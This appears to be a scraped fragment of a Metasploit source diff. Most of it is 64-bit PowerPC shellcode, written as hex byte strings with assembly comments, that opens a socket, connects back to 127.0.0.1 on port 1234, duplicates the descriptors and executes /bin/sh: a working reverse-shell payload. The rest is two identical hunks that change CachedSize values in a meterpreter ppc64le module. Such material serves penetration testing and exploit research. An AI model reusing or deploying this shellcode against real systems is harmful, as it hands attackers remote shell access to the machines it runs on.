||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" + # li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" + # mr r21,r1 #
|
||||
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
|
||||
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1079888
|
||||
CachedSize = 1079936
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1079888
|
||||
CachedSize = 1079936
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|